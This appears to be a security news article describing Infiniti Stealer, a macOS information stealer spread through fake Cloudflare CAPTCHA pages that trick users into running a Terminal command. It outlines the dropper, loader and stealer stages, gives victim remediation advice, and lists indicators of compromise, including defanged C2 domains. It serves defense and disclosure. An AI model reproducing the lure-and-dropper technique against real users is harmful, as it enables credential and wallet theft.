Security researchers have recently identified a new macOS information stealer, initially dubbed NukeChain, now known as Infiniti Stealer. This malware is designed to extract sensitive information from Mac users, employing a rather insidious method that circumvents traditional security measures.
Rather than relying on intricate software exploits, Infiniti Stealer utilizes a social engineering tactic referred to as ClickFix. This approach deceives victims into unwittingly infecting their own systems. The attack commences with a counterfeit Cloudflare human verification page, which is hosted on malicious websites.
The seemingly legitimate fake CAPTCHA prompts users to open their Mac Terminal and input a specific command to verify their humanity. By executing the command themselves, users inadvertently bypass conventional security defenses, such as antivirus software and exploit blockers.
The Infection Process and Payload
Upon pasting the command into their Terminal, victims trigger a three-stage infection process. The first stage involves a Bash dropper script that downloads and decodes a hidden payload from the attacker’s server. This script saves a new file in the temporary folder, removes Apple’s protective quarantine flag, and initiates the next stage in the background, all while swiftly closing the Terminal window.
The second stage introduces a Nuitka loader, specifically crafted for Apple Silicon Macs. Unlike typical Python malware, Nuitka compiles Python code into a native application, significantly complicating detection and analysis by security tools. This loader decompresses a substantial embedded data file and activates the final malicious stage.
The ultimate payload is the Infiniti Stealer itself, which seeks to harvest a wide array of personal data, including browser passwords, macOS Keychain entries, cryptocurrency wallets, and plain-text developer secrets. Additionally, it has the capability to capture screenshots of the compromised machine.
The emergence of Infiniti Stealer underscores a troubling trend: macOS is increasingly becoming a prime target for malware operators. If you have recently entered a command into your Terminal to bypass a CAPTCHA, it is crucial to assume that your device may be compromised. No legitimate website would ever request Terminal access for identity verification.
If you suspect that your system has been infected, it is imperative to take immediate action to safeguard your digital presence:
- Cease using the infected Mac for any sensitive activities, such as banking or work.
- Change your passwords using a completely different device.
- Revoke access to active sessions, API tokens, and SSH keys.
- Inspect your system for suspicious files hidden in temporary folders or launch agents.
- Conduct a full scan with reputable security software to eliminate any lingering malware.
For security professionals and threat hunters, monitoring specific technical footprints is essential to track this malware. Below are the primary Indicators of Compromise (IOCs) associated with the Infiniti Stealer campaign:
| Type | Value |
|---|---|
| MD5 Dropper | da73e42d1f9746065f061a6e85e28f0c |
| SHA256 Stage-3 | 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958 |
| C2 Domain | update-check[.]com |
| C2 URL | https://update-check[.]com/m/7d8df27d95d9 |
| C2 Panel | Infiniti-stealer[.]com |
| Packer Magic | 4b 41 59 28 b5 2f fd (KAY + zstd) |
| Debug Log | /tmp/.bs_debug.log |
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
